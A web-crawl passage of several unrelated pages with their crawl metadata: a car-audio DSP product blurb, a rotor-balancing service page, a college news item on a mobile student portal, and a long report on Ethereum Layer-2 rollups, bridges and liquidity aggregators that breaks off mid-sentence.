conventional routing concepts quickly reach their limits, both in terms of implementation and usability. Audiotec Fischer's new, multi-stage "Virtual Channel Processing", in conjunction with the recognized user-friendly DSP PC-Tool software, makes it easy to realize even highly complex system configurations. Besides that it allows to freely assign our proprietary FX sound features such as "RealCenter" or "StageEQ". The simple adaptation to existing factory radios or multi-channel OE sound systems is more important than ever before – and that's why the DSP ULTRA is not only equipped with the latest generation ADEP.3 circuit, but also offers a particularly large adjustment range for the input sensitivity. The enormous range of 1 - 8 Volts (RCA) or 4 - 32 Volts (highlevel) allows the combination with almost any imaginable analog signal source, even with high-power OE amplifiers. Despite its vast range of functions, the new HELIX DSP ULTRA inspires with its straightforward and timeless design that is still compact – ideal for a simple installation. The sum of its characteristics makes the HELIX DSP ULTRA the perfect "tool" for every uncompromising audiophile music lover with highest demands. |Enclosure width (mm)||177| |Enclosure height (mm)||40| |Enclosure depth (mm)||170|
systems_science
https://www.elliott-turbo.com/high-speed-balance
2024-04-16T05:32:00
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817043.36/warc/CC-MAIN-20240416031446-20240416061446-00454.warc.gz
0.934541
296
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__99736940
en
Ebara Elliott Energy's state-of-the-art, high-speed rotor balance facility features computer-aided balancing and one of the largest balancing chambers in the world, with an underground bunker and control room. The bunker chamber operates under vacuum which allows balancing of fully bladed rotors under running conditions. During planned or unplanned maintenance, turbomachinery rotors are typically balanced at low speed before reinstallation. However, repairs to the rotor or replacement of rotor parts can cause changes to the rotor dynamics that are not detectable during low-speed balance. Undetected imbalances can excite the rotor at operating speed, causing it to vibrate excessively. High vibration can trigger an unplanned shutdown, potentially costing millions of dollars in lost production. Our high-speed balancing capabilities minimize vibration in any manufacturer's rotor throughout the entire speed range. High-speed balance also relieves residual stresses introduced during the repair process and allows the rotor components to settle into place. Following a high-speed balance at our facility, engineers and technicians review the results to ensure that any imbalances have been corrected and will not affect the future performance of the rotor. Certain circumstances dictate that a rotor should be balanced at high speed before going into service: At Ebara Elliott Energy, we know that turnaround timetables can be tight. We regularly balance rotors and ship them back to customers within 24 hours after delivery to our high-speed rotor balance facility.
systems_science
http://csceagle.com/2012/12/21/csc-launches-mobile-friendly-online-platform/
2018-02-21T07:26:04
s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891813571.24/warc/CC-MAIN-20180221063956-20180221083956-00371.warc.gz
0.937762
315
CC-MAIN-2018-09
webtext-fineweb__CC-MAIN-2018-09__0__253560582
en
CSC launches mobile-friendly platform Since yesterday’s launch of a new online platform, CSC’s students can now access a wealth of online data including class schedules, financial aid information, and more in mobile-friendly format. The platform at https://mycscmobile.nebraska.edu/, termed MyCSCMobile, allows users to access data from the Nebraska Student Information System from the convenience of their mobile devices. “NeSIS is the electronic database that contains personal records for students, parents, employees, students who have graduated since 1985 and applicants of the university’s four campuses and Nebraska’s three state colleges,” the University of Nebraska-Lincoln’s website states. “It manages nearly every aspect of the student experience, including admissions, housing and course registration.” NeSIS is housed at the University of Nebraska Computer Services Network data center. CSC’s Chief Information Officer Ann Burk said Friday that the platform was officially launched Dec. 20 and that, as it was a part of the statewide NeSIS project, the college paid less than $5,000 for its use. Chadron State is the only one of Nebraska’s three state colleges to adopt the new system, Burk said. “Wayne and Peru decided to wait.” “We’re really excited,” she said. “Students will have access to MyCSC from basically anywhere using their smart phones.”
systems_science
https://albaronventures.com/ethereum-layer-2-ecosystem/
2024-03-01T18:01:28
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475422.71/warc/CC-MAIN-20240301161412-20240301191412-00815.warc.gz
0.906704
9,404
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__16639277
en
The Ethereum rollup-centric roadmap represents the first blockchain solution that can scale for global adoption through the combination of rollups and data shards. To achieve this goal, Ethereum will transform itself into the settlement layer for rollups. This shift marks the separation between the security and execution layers, as a result, it will be possible to leverage a modular architecture to scale beyond the limits that are imposed by Layer-1 solutions. Rollups are a type of Layer-2 scaling solution that increases Ethereum’s throughput by performing transaction execution off-chain and posting transaction data on Layer-1. Due to this, rollups inherit Ethereum’s security properties and optimize for execution. Rollups can be segmented into two different types, optimistic rollups, and zk-rollups. The main difference between both rollups lies in the method in which they are verified by the underlying Layer-1. Optimistic rollups do not perform any computation by default. Instead, they post data to the Layer-1 base chain and assume that it is correct. To ensure that all transactions are legitimate, optimistic rollups rely on fraud proofs that challenge state changes and introduce high exit times that can vary between one day and a week. Alternatively, zk-rollups generate validity proofs that are posted on Layer-1 with a given batch of transactions. Unlike optimistic rollups, these cryptographic proofs can be instantly confirmed, thereby, zk-rollups aren’t liable to high exit times. Despite this clear advantage, validity proofs have high confirmation costs that impose infrequent confirmations. Due to this cost-driven delay that is introduced by increased complexity, exit times from zk-rollups are not immediate. Disregarding the tradeoffs that exist between both types of rollups (e.g. Performance versus EVM-compatibility), moving assets between rollups and the Layer-1 base chain involves high exit times and costs. For that reason, these limitations introduce new obstacles for Ethereum’s Layer-2 ecosystem, such as limited cross-rollup composability, and fragmented liquidity. As such, interoperability bridges represent crucial infrastructure when it comes to overcoming these challenges and avoiding a siloed rollup ecosystem. By enabling users to directly move assets from rollup to rollup, these bridges reduce friction and enable fast and cost-effective transactions. Therefore, it is possible to retain cross-rollup composability for the application layer and a frictionless flow of liquidity from rollup to rollup. Furthermore, it is essential to improve the liquidity that is present in these bridges in order to ensure optimal trade executions and avoid high price impacts within bridge AMMs that would ultimately undermine the flow of liquidity between rollups. For that purpose, liquidity infrastructure layers, such as Tokemak, can prove to be important components for the Layer-2 ecosystem by providing sustainable and reliable liquidity to interoperability bridges. Additionally, this approach removes the unsustainable and inflationary dependency from liquidity mining rewards. Lastly, to complete the infrastructure stack, and to ensure an optimal user experience for the rollup ecosystem, it is equally necessary to adopt cross-chain bridge aggregators that will route users through the best bridge solution. This report addresses the present and future state of Ethereum’s Layer-2 ecosystem and it explores how rollups, interoperability bridges, and cross-chain aggregators will define the next evolutionary step of blockchain scaling powered by a sustainable liquidity layer that is based on a rollup-centric model. For optimistic Rollups, Ethereum’s security layer assumes that a given batch of transactions is valid by default; this approach leads to large scalability improvements (up to x100). That batch of transactions will only be rejected if a participant that is monitoring the rollup submits a valid claim that demonstrates that the transaction is fraudulent, this is known as “fraud-proof”. This time interval during which network participants can contest the legitimacy of the data that is included in a given batch of transactions constitutes a dispute period when anyone can submit fraud proofs. Once this period is over, the transactions processed by the rollup receive the final acceptance from the security base layer. This challenge interval introduces high exit times that create long withdrawal periods (generally one week). The underlying security assumption that is made for optimistic Rollups is that there is at least one honest network participant. This implies that if that assumption holds true and one honest network participant submits a valid fraud-proof, the rollup will process transactions correctly. In order to incentivize all network participants to process only legitimate batches of transactions, sequencers (block producers and transaction processors), and participants that submit fraud proofs, are required to bond tokens that are forfeit in the event of a lost dispute. This approach creates strong incentives that avoid spam attacks with false fraud proofs or fraudulent transactions. The advantage that optimistic rollups currently offer when compared to zk-rollups, lies in the existing EVM-compatibility. This means that optimistic rollups are ideal for general purpose applications that enable the seamless migration of applications that create easier portability of native solidity contracts. Optimism and Arbitrum Optimism and Arbitrum are both Ethereum scaling solutions based on EVM-compatible optimistic rollups. Despite the existing similarities, each solution opted for different approaches regarding implementation, deployment of protocols, ordering of transactions, and dispute resolution models. Optimism decided to follow an approach based on a permissioned contract deployment, as such, the platform partnered with the Synthetix ecosystem and Uniswap to test its network prior to its launch. Contrastingly, Arbitrum decided to provide open access for all protocols that wished to deploy on its platform. This distinct approach allowed Arbitrum to create stronger network effects when compared to Optimism through a more diverse ecosystem of applications. Table 1 contains the current ecosystem metrics for Arbitrum and Optimism. |Total Value Locked |Nº of Dapps With respect to the existing implementation, Optimism adopted Geth’s codebase with minimal changes. Alternatively, Arbitrum decided to build its own implementation, ArbOS. As a result, it is possible to conclude that Optimism prioritized stability, whereas Arbitrum optimized its implementation for Layer-2. Furthermore, Arbitrum runs a sequencer that is responsible for ordering transactions, while Optimism auctions the existing MEV to other parties for a given period of time. Lastly, the major difference between Optimism and Arbitrum lies in the dispute resolution model. When a challenge is submitted on Optimism, the network runs the whole transaction through the EVM, on the other hand, when a challenge is submitted on Arbitrum, the network uses an off-chain dispute resolution method that requires only a single step of the transaction. Therefore, it is possible to conclude that Optimism’s approach to dispute resolutions is simpler and faster, while Arbitrum’s approach is more complex but less expensive due to lower transaction costs on the underlying Layer-1. Currently, Optimism and Arbitrum are throttled while in beta, as the throttle is lifted, fees will decrease on both networks. It is worth noting that the lower transaction costs offered by optimistic rollups are particularly evident for transactions that require higher levels of complexity, the following table 2 depicts this relationship and provides a transaction cost comparison for both networks. As expected, transactions that are more complex have higher costs that are intrinsic to the transaction type. Additionally, it is also possible to conclude that the decrease in transaction costs that is achieved by rollups is larger for complex types of transactions (e.g. swaps versus ETH transfers). Zk-rollups bundle batches of transactions off-chain and generate cryptographic zero-knowledge proofs which are used to record the validity of the block on the Ethereum base chain. This verification method creates validity proofs that can be immediately confirmed and thereby verify the correctness of a given batch of transactions. Such an approach implies that Ethereum only accepts batches of transactions that can be cryptographically verified, in contrast with optimistic rollups where transactions are valid by default, zk-rollups assume that transactions are invalid until proven otherwise. Furthermore, zk-rollups aren’t liable to the trust assumptions that optimistic rollups are subject to (i.e. at least one honest network participant). Due to this, zk-rollups are able to provide better security than their optimistic counterparts. Ultimately, zk-rollups offer lower fees and faster transactions when compared to optimistic rollups because confirmation times are immediate and less data is included while validating a block (this can be further improved by representing an account by an index rather than an address on Layer-2). Additionally, they are also able to avoid the week-long exit times that are imposed by optimistic rollups. Despite seeming inherently superior to optimistic rollups, the lack of EVM-compatibility remains a short-term obstacle for the adoption of zk-rollups as the leading Layer-2 scaling solution. Execution layers such as zkSync 2.0 are addressing this limitation through the zkEVM engine which will provide Ethereum’s security and solidity smart contract support to zk-rollups. The zk-rollup architecture contemplates two distinct types of users that are given as follows: - Transactors – This user creates the transaction transfer and signs it with his private key before sending the transaction to the relayer and broadcasting it to the network; - Relayer – The relayer collects and verifies several transactions that are then bundled into a batch. This batch has a validity proof associated with it that is generated by the relayer. Finally, the relayer submits the essential transaction data, the validity proof, and the root (one for accounts, and another for balances) of the new user state to the chain’s smart contract. This service is provided in exchange for a fee that incentivizes the relayer and covers the gas that is consumed by the validity proof’s submission and the transaction data to the chain. zkSync is an EMV-compatible Layer-2 scaling solution based on zk-rollups. As such, zkSync inherits Ethereum’s security (i.e. funds are held by a smart contract on Layer-1), while computation and storage are performed off-chain. Similar to other zk-rollups, zkSync generates validity proofs (SNARK) for each state transition within a rollup block. These validity proofs are then verified by the base chain smart contract. An architecture based on zk-rollups guarantees that validators cannot corrupt state transitions (unlike optimistic rollups), and users can always retrieve their funds through the underlying Layer-1 (zkPorter is an exception where funds can be frozen). This is possible due to the existence of validity proofs that replace trust assumptions related to validators. zkSync 2.0 was designed to maximize all components of the blockchain trilemma with an added characteristic, programmability. To achieve this purpose zkSync 2.0 combines two novel elements, zkPorter, and zkEVM. zkPorter is an off-chain data availability (DA) system that maximizes the scalability that can be offered by zk-rollups. The zkEVM, on the other hand, is the engine that powers zkSync’s EVM-compatible zk-rollup. Due to the zkEVM virtual machine, zkSync is able to support solidity smart contracts. Both solutions are fully composable and interoperable with each other. zkSync 2.0 – State Architecture The transaction costs that are associated with zk-rollups are two orders of magnitude smaller than the transaction costs that exist within Ethereum. Regardless, considering that both vary linearly, it is necessary to mitigate the effect of induced demand which dictates the linear rise of transaction costs on zk-rollups when compared to the base chain. To address this issue, zkSync 2.0 developed zkPorter which enables stable transaction costs through an exponential gain in throughput that is achieved through off-chain data availability. In zkSync 2.0 the Layer-2 state is divided into two separate components, zk-rollups, and zkPorter. The main distinction between both components lies in the data availability. Zk-rollups maintain all data availability on-chain (thus stored in Ethereum’s DA layer), while zkPorter maintains all data availability off-chain. As such, each component offers distinct levels of security and costs. On a zk-rollup, the state root is held off-chain and it is represented as a Merkle tree where the leaves are zk-rollup accounts. The root hash of the Merkle tree constitutes the cryptographic commitment to the state root and it is stored on the rollup’s smart contract on Ethereum. To guarantee the required data availability, all state updates are published to the Ethereum network as calldata. Whenever a state change occurs in a given account within a block, the final state of that account is sent to Ethereum as a state update which is propagated through the entire network. This approach guarantees that users have access to that data and it is always possible to fetch funds through Ethereum where validity proofs ensure that the published data corresponds to the state transition. Due to this, zk-rollups provide the same security as the underlying base chain. In order to overcome the throughput bottleneck that is imposed by Ethereum’s block size, zkSync developed zkPorter as an off-chain data availability solution. While zk-rollup accounts publish both the calldata and the root hash to Ethereum, zkPorter accounts only publish the root hash to the base chain. The transaction calldata, which is associated with zkPorter accounts, is published on a separate network. It is important to note that both types of accounts remain fully composable and interoperable with each other (e.g. zkPorter accounts can interact with DeFi protocols deployed on zk-rollup accounts). Figure 2 illustrates the architecture of zkSync 2.0 subtrees separated by type of account. To secure the data availability of zkPorter, zkSync designed the Guardian network. This network relies on zkSync token holders (named Guardians) that stake their tokens and store data on behalf of zkPorter users in exchange for a fee. Guardians participate in zkSync’s Proof of Stake consensus and they are required to sign all blocks with a supermajority of signatures to confirm data availability for zkPorter accounts. If they fail to do so, the existing stake is slashed. As a result, it is possible to conclude that zkPorter’s data availability is preserved through cryptoeconomic guarantees. Considering that a supermajority of guardians is malicious, it would be possible to freeze the zkPorter state. By doing so, guardians would freeze the funds that are associated with zkPorter accounts (due to the denial of data availability), and their own stake. As such, there is no cryptoeconomic incentive to attack the network. Regardless, no funds would be stolen under these circumstances and zk-rollup accounts would be unaffected by this lack of data availability within zkPorter. Table 3 contains the projected transaction costs and throughput for both rollup modes that are supported by zkSync, it is worth noting that this projection doesn’t contemplate Ethereum’s sharding upgrade which will dramatically increase its data-availability. |1/100th of L1 Fees The zkEVM is zkSync’s EMV-compatible virtual machine that runs zkSync smart contracts based on SNARK logic. This virtual machine provides efficient execution of zero-knowledge proofs in a circuit and it is able to run Solidity smart contracts while maintaining its behavior. In order to create a functional virtual machine based on zero-knowledge proofs, it was necessary to develop an instruction set of the zkEVM for circuit and execution environments. The circuit environment is responsible for proof generation (which is slow), while the execution environment is an implementation of the zkEMV in Rust that provides simple execution and allows instant settlements of transactions on zkSync. Using recursion both between blocks and within blocks, the zkEVM is able to post one single proof for N blocks, and it can also aggregate subproofs for different logical parts of the block. The zkEVM compiler is built using the LLVM framework. This compiler relies on Zinc, which is a Rust-based language for smart contracts and general-purpose zero-knowledge proof circuits, and Yul, which is a Solidity representation that can be compiled to bytecode for different backends. As a result, the zkEVM offers developers the possibility to program smart contracts in native Rust. Starkware is a company that is focused on improving scalability and privacy for blockchains by using STARK technology to deploy and verify zero-knowledge proofs. For the scope of this report, the two following products developed by StarkWare will be addressed: StarkEx, and StarkNet. StarkEx is an Ethereum Layer-2 scalability solution developed by StarkWare that relies on validity proofs (STARKs) and is able to operate in two different modes: zkRollup or Validium. These modes of operation vary in terms of data-availability, due to this, they represent tradeoffs between security and costs. While using the zk-rollup mode, the required data that is necessary to recover Layer-2 balances (stored within the state Merkle Tree), is published on-chain as calldata. This process is enforced by the Cairo program (a general and Turing complete language developed for STARKs), which provides as an output the complete list of differences of the user’s balances from the previous states. As a result, the zk-rollup mode is trustless and all the required data that is necessary to access funds through Ethereum is available on-chain. Alternatively, while using the Validium mode, the data that is necessary to recover Layer-2 balances is published off-chain to trusted parties that are known as committee members. New state updates are only accepted as valid if the availability verifiers reach a quorum and sign the state update. The main advantage of Validium when compared to the zk-rollup mode is that there are no gas costs associated with transaction calldata; as such, a state update only spends gas to verify the corresponding proof. Similar to zkPorter, the off-chain actors that are responsible for all data availability can freeze (but not steal) the user’s funds if the majority colludes. All applications built on StarkEx, define their own business model and run on the StarkEx Service thus creating a diverse design space for the application layer. In fact, applications such as ImmutableX, go to the extent of not charging minting fees on NFTs. Table 4 shows the applications that are currently live on StarkEx and their respective metrics. |Total Value Locked |Sports NFT Game On zk-rollup mode, users submit transactions that are batched by the StarkEx Service (off-chain component responsible for batching and coordination). Upon creating a batch of transactions, this service sends the batch to a shared proving service termed SHARP. The proving service is then able to generate a validity proof for the batch. Once the proof for the batch is generated, SHARP sends the STARK proof to the STARK Verifier for verification. The service then sends an on-chain state update transaction to the StarkEx Contract, which will be accepted only if the verifier finds the proof valid. On Valium mode, users submit transactions that are batched by the StarkEx Service. Upon creating a batch of transactions, the StarkEx service sends the batch to SHARP thus generating the validity proof for the batch. Akin to the zk-rollup mode, the proving service sends the STARK proof to the STARK Verifier for verification, however, instead of sending an on-chain state update transaction to the StarkEx Contract, the StarkEx service sends the state update. Volitions break the Validium versus zk-rollup dichotomy by creating a hybrid solution that allows each user to pick one of both modes at an individual transaction level. As such, the volition approach creates a spectrum of data-availability that grants flexibility to all shareholders according to their priorities. With Volitions, users that prioritize low costs can use the Validium mode, while DeFi protocols that prioritize security can deploy contracts on zk-rollup mode. Furthermore, exchanges such as DeversiFi may opt to rely on off-chain data-availability solutions, such as Validiums to protect the privacy of its customers (e.g. professional traders), while other users prioritize security and therefore use the zk-rollup mode. The StarkEx scalability solution relies on the following components: - StarkEx Service – This off-chain component is responsible for batching and coordinating transactions. The service sends the batch of operations to the proving service which generates the correspondent validity proof. Once the proof is verified, it publishes the new state; - SHARP – Shared proving service for Cairo programs that receives proof requests from different applications and outputs proofs to attest to the validity of Cairo executions; - Stark Verifier – On-chain component that receives a validity proof associated with an update and verifies that the proof is valid; - StarkEx Contract – Responsible for state updates and the non-custodial management of deposits and withdrawals; - Cairo – A Turing-complete language for generating STARK proofs for general computation; StarkNet is a decentralized and permissionless Validity-Rollup that relies on STARK technology (e.g. provers and verifiers) to scale Ethereum on Layer-2. This ZK-Rollup solution (which is currently under development) supports general computation over Ethereum and is based on the Turing-complete Cairo language. Furthermore, StarkNet will expand beyond Rollups and it will become a Volition that supports Validium mode for off-chain data-availability. As such, users will be offered a hybrid solution that allows them to opt between security and cost tradeoffs at an individual transaction granularity. StarkEx was an important step towards the development of StarkNet, oversimplifying its structure, it is possible to claim that StartNet has a similar architecture to StarkEx with the exception that it supports arbitrary contract execution and additional bridges. Furthermore, StarkEx represents a standalone system for exchanges that uses the STARK proof system in order to provide scalability. Contrastingly, StarkNet is a general-purpose system for the deployment and interaction of contracts just like Ethereum. Akin to StarkEx, all transactions on StarkNet will be periodically batched with their validity proven in a STARK proof which is verified on Ethereum. Considering that all StarkNet state transitions will be STARK-proven, only valid transactions will be accepted on Ethereum. Initially, all the required data to reconstruct the full StarkNet state will be published on-chain (zk-rollup mode), furthermore, anyone will be able to run a StarkNet node thus ensuring that StarkNet is permissionless and secure. It is important to note that contrary to the present Layer-1 paradigm, StarkNet will decrease its cost per transaction as the network scales. StarkNet’s roadmap is given as follows: - Single-App Rollups – This represents the first step of StarkNet’s roadmap. At this stage each StarkNet instance will support and run single applications; - Multi-Apps Rollups – At this point, each StarkNet instance will be able to run multiple applications thus supporting cross-application interoperability by accessing the same global Layer-2 state; - Decentralized Rollup – This constitutes the final stage of StartNet’s development where the platform becomes fully decentralized and permissionless; StarkNet Alpha was released on a public testnet in June 2021, since then, the testnet has been upgraded twice. The Alpha 1 release included on-chain data-availability and a cross-layer messaging protocol. As such, powered by validity proofs, new forms of interoperability between Layer-1 and Layer-2 are now possible. The Alpha 2 release, on the other hand, enabled composability, as a result, StarkNet Alpha is now able to support interaction between smart contracts. The next stage for StarkNet’s development starts with the Alpha release on Mainnet. Similar to Optimism, StarkNet will follow a permissioned approach to smart contract deployments where an initial whitelisting will take place. Additionally, new ecosystem efforts such as Warp, a Solidity to Cairo compiler, standardized contracts (developed by Open Zeppelin), and a StarkNet explorer termed Voyager are currently under development. Ethereum’s rollup-centric roadmap represents the next evolutionary step in terms of scalability; however, to preserve composability and mitigate fragmented liquidity, Layer-2 solutions will require interoperability bridges. These bridges are essential to establish cross-rollup transfers, communication, and to avoid the high exit times that are inherent to optimistic rollups. Different bridge designs offer different tradeoffs (e.g. security, speed, and capital efficiency), due to this, each use case needs to be adapted and contextualized with the existing tradeoffs. Given the scope of this report on EVM-focused solutions, Hop protocol and Connext will be addressed due to the trustless characteristics that grant them the same security as the underlying base layer. Connext is an interoperability bridge based on a trustless network of state channels that enables cross-chain transactions of value and calldata. Due to its design, all transactions conducted on Connext have the same security as the underlying chain. Within this network, there are state channel nodes, termed routers, that act as liquidity providers and front liquidity on the receiving end whenever a transaction takes place. Unlike other interoperability bridges, Connext doesn’t create representative assets nor does it incur any Layer-1 costs while conducting cross-rollup transactions. Connext routers can be seen as state channel nodes that automatically forward all in-channel transfers that are sent to it. As such, for a cross-chain transaction, the Connext router will be responsible for transferring funds in-channel to the destination chain in exchange for funds on the origin chain. In order to incentivize routers and to cover the existing expenses (e.g. server and transaction costs), there are fees (static or dynamic) that are applied to all transactions. Considering that Connext relies on state channels, transfers are atomic and therefore trustless. Furthermore, the protocol also supports arbitrary conditionality, as such, it is possible to pass calldata in order to execute contract interactions. Figure 6 represents an oversimplified architecture of Connext’s network. To illustrate how cross-chain transactions work on Connext consider the following example where user A wants to transfer 1000 DAI from Arbitrum to Optimism: - User A is matched with a Connext router (that will front liquidity on the destination rollup) thus opening a state channel between both on the origin rollup; - The router verifies that user A has opened a state channel on the origin rollup and proceeds to open another state channel by locking the same amount of funds (minus fees) on the destination rollup; - User A signs a commitment transaction and shares it with the router off-chain thus ensuring that it has the secret without revealing it, this ensures the router that it is possible to unlock funds on the origin chain with the correct secret; - The router proceeds to create a commitment transaction that unlocks funds on the destination rollup with user’s A secret; - User A unlocks funds on the destination rollup using its secret and the router’s commitment transaction, by doing so, the user reveals its secret on-chain; - The router can now unlock the funds on the origin rollup with the user’s secret and the commitment transaction thus settling the transaction; The previous example can be summarized by stating that the Connext router provides funds on the destination rollup in return for the same funds plus a fee on the origin rollup. The only bottleneck that exists within this architecture is the available liquidity. Considering that a given router has mainly unidirectional transactions, it is possible to conclude that the available liquidity will quickly become unbalanced. To mitigate this issue, Connext developed virtual AMMs that incentivize arbitrageurs to make transactions in the direction that rebalances the existing liquidity within Connext’s network of routers. Lastly, it is important to note that Connext was started in 2017 and its team has been a core part of the Layer-2 research community since the deployment of the first general-purpose payment system in 2018. As such, the work that has been developed by the team on state channel systems reflects several years of experience and iterations that ultimately led to Connext’s current bridge design for cross-rollup interactions. Hop protocol is a cross-rollup general token bridge that enables fast and cost-effective transactions between different rollups and the Ethereum base chain. Structurally, the protocol can be segmented into three different parts: Bonders, cross-network bridge tokens, and Hop’s Automatic Market Maker. Bonders are third-party entities that provide upfront liquidity for swaps at the destination chain, the cross-network bridge token is used to transfer assets between different rollups (or to claim the underlying asset on the Ethereum mainnet), and the AMM is used to swap between bridge tokens and the rollup token representation. Furthermore, Hop’s AMM enables a dynamic pricing of liquidity and its respective rebalancing across the network. Hop bridge tokens (i.e. hAssets) are intermediary assets that exist within Hop Protocol to facilitate cross-rollup transactions. In order to mint hAssets, it is necessary to deposit the corresponding asset into the Layer-1 Hop bridge contract (e.g. 1000 USDC deposit on Layer-1 can mint 1000 hUSDC on a Layer-2 Hop bridge contract). As a result, hAssets have a 1:1 collateralization. While redeeming hAssets the same logic is applied. The Hop bridge token is burnt on Layer-2 and the underlying asset is unlocked on Layer-1. Liquidity Bonders provide upfront liquidity on the destination rollup in exchange for a fee. To do so, Bonders are required to run full verifier nodes on rollups in order to facilitate cross-rollup transactions. This technical requirement allows Bonders to check if users burn the necessary hAssets on the origin rollup. Once that criteria is met, Bonders proceed to lock up collateral that makes them eligible to mint and use hAssets on the destination rollup. While exchanging Hop bridge tokens between different rollups, Hop protocol mints a hAsset on the destination rollup and burns it on the origin rollup. In order to execute a quick cross-rollup transfer of assets, the protocol relies on a third-party called “Bonder” that provides upfront liquidity on the destination rollup in exchange for a fee. Once the transfer is propagated through Layer-1, the Bonder’s liquidity is returned. To illustrate how cross-rollup transfers work on Hop protocol consider the following example: - USDC is swapped for hUSDC through Hop’s AMM on Rollup 1; - Using the Hop Bridge, the protocol sends hUSDC from Rollup 1 to Rollup 2; - The Bonder provides upfront liquidity for hUSDC on Rollup 2; - hUSDC is swapped for USDC through Hop’s AMM on Rollup 2; Connext versus Hop Protocol Hop protocol and Connext are trustless interoperability bridges that adopt 1:1 swaps instead of any-to-any swaps; as such, both protocols optimize for capital requirements and sacrifice flexibility for users. This approach ensures that Connext and Hop have bridge designs that allow them to remain highly scalable. In terms of capital efficiency, Connext is better positioned than Hop protocol, this is due to the fact that Hop requires active liquidity for Bonders and passive liquidity for its AMM pools that are distributed among all chains that are connected by the protocol. Furthermore, Hop protocol leverages arbitrary messaging bridges (AMBs) to send funds between chains, due to this, Bonders are required to lock their liquidity while the transaction is passed through the AMB (rollups require 1 day). Connext routers, on the other hand, only require exit liquidity with no lockups, as such, Connext is more capital efficient. It is worth noting that passive liquidity can be easily sourced by incentivizing AMM pools with liquidity mining programs. Taking into account that Connext relies on off-chain state channels, the protocol is able to settle transactions directly on Layer-2, as a result, while transacting assets between Layer-2 solutions, the system only spends gas on Layer-2. Conversely, all transactions on Hop protocol are required to be bonded on the Ethereum Layer-1. Considering that the protocol bundles a high number of transactions, it is still highly gas efficient. With regard to liquidity rebalancing and the pricing of swaps, Hop protocol relies on its AMM pools to determine swap rates and to reallocate liquidity within the network through arbitrage incentives that counteract unidirectional flows of liquidity. Alternatively, Connext Bonders charge a flat fee for each transaction and rebalance liquidity within the network manually. This system will be upgraded with the introduction of a Virtual AMM that allows routers to price cross-chain transactions based on the available liquidity. As a result, arbitrageurs will be incentivized to profit by reallocating liquidity within Connext’s network of routers. Both Connext and Hop protocol are trustless and non-custodial bridges that prioritize security. Connext relies on state channels that do not publish data on the base layer, due to this, the main trust assumption that is made by the protocol is data availability. This liability can be mitigated by storing off-chain states and monitoring the underlying base layer in order to solve withdrawal disputes if one party is dishonest. In Hop’s case, the protocol inherits the security of rollups (e.g. Arbitrum), and therefore, the security of the underlying Ethereum Layer-1. For transactions between sidechains, users are liable to weaker security when compared to the Ethereum Layer-1, regardless, this vulnerability is contained within that network without compromising the system as a whole. In summary, both interoperability bridges prioritize security, fast swaps, and short tail assets. Due to its design, Hop protocol is optimal for rebalancing liquidity and smart contract applications, on the other hand, Connext is more capital efficient. Lastly, it is important to note that Hop transfers can be initiated by smart contracts (this isn’t possible with Connext), therefore, Hop’s use cases can be expanded to cross-chain DEXs and other multi-chain applications. Liquidity Layer – Tokemak Interoperability bridges are the solution to the high exit times and costs that are intrinsic to optimistic rollups, however, the liquidity that is available for cross-chain transactions remains a limiting factor for the mainstream adoption of the Ethereum Layer-2 ecosystem. This aforementioned limitation is particularly evident while transferring assets using Hop protocol. As a matter of fact, for each cross-chain transaction, a large part of the fees can be attributed to the price impact that is associated with the trade size. This occurs due to the limited liquidity that is available within Hop’s pools. For that reason, it is still unfeasible to conduct large cross-rollup transactions. In order to overcome this limitation it is necessary to increase the liquidity that is available in interoperability bridges, this will provide cheaper cross-chain transitions for end users and catalyse the development of the Layer-2 ecosystem through improved trade execution, better composability, and unified liquidity. As a decentralized market-maker, Tokemak is uniquely positioned to solve this obstacle and provide liquidity to interoperability bridges. With new liquidity mining programs being rolled out to incentivize the migration of capital from Layer-1 to Layer-2, there is an opportunity to establish symbiotic relationships that target long-term sustainable liquidity between cross-chain bridge solutions and Tokemak. In the particular case of Hop protocol and Connext these are the following sources of demand for Tokemak’s liquidity: - Bridge Reactors – These hypothetical reactors can provide liquidity to Hop’s AMM pools with a minimized impermanent loss risk (i.e. unlikely deviation of hAsset:Asset peg). Furthermore, Tokemak can also provide liquidity to Hop Bonders and Connext Routers under the same assumption of no impermanent loss risks; - Arbitrage Reactors – With liquidity deployed on multiple layers, Tokemak is uniquely positioned to create arbitrage reactors that rebalance liquidity in exchange for profit, this would be particularly useful to correct unidirectional imbalances of liquidity within the Connext network of Routers; Cross-Chain Liquidity Aggregators The growing number of interoperability bridges that connect Layer-2 solutions, and the overall EVM ecosystem, creates a new demand for the best quotes over a vast spectrum of assets that exist on different platforms. Due to this, cross-chain liquidity aggregators that route users through the best interoperability bridges become necessary to ensure optimal quotes for cross-chain swaps. Additionally, by aggregating cross-chain DEXs, these liquidity aggregators enable any-to-any swaps. Projects such as MOVR Network and Li.Finance are cross-chain liquidity aggregators that offer this value proposition and facilitate the mass adoption of Layer-2 solutions by promoting user abstraction. MOVR Network is a cross-chain liquidity aggregator that allows users to move funds between different chains through optimal routes. The protocol achieves this value proposition by aggregating all DEXs and DEX aggregators within its architecture, by doing so, MOVR abstracts the decision making process from end users and optimizes transfers according to the following parameters: - Maximum output (ETH) on the destination chain; - Minimum GAS fee for swap and transfer; - Lowest Bridging Time; Upon ordering all available routes according to the aforementioned parameters, the user is able to decide between the fastest or cheapest routes according to personal preferences. Furthermore, the protocol also enables zero-cost cross-chain transfers through its peer-to-peer settlement layer which is incorporated in the system’s architecture. The following example illustrates a costless peer-to-peer transaction executed on the MOVR Network: - User A wants to transfer 1000 USDC from Rollup 1 to Rollup 2; - User B wants to transfer 500 USDC from Rollup 2 to Rollup 1; - MOVR settles 500 USDC between user A and B; - MOVR transfers the remaining 500 USDC from Rollup 1 to Rollup 2; Li.Finance is a cross-chain aggregator of liquidity networks that aims to facilitate the adoption of Layer-2 solutions by routing DeFi users through optimal cross-chain bridges. Structurally, the protocol can be segmented into three aggregation layers: cross-chain liquidity networks, lending protocols, and decentralized exchanges. The cross-chain liquidity network layer creates the required backend and frontend infrastructure to aggregate existing interoperability bridge solutions (e.g. Connext and Hop protocol), the lending protocol layer allows users to access more funds and leverage existing cross-chain arbitrage opportunities with flash loans (e.g. Aave and HiFinance), and the decentralized exchange layer enables cross-chain any-to-any swaps (e.g. Uniswap and ParaSwap). The protocol’s architecture prioritizes trustless and secure swaps thus allowing its users to find the fastest and most 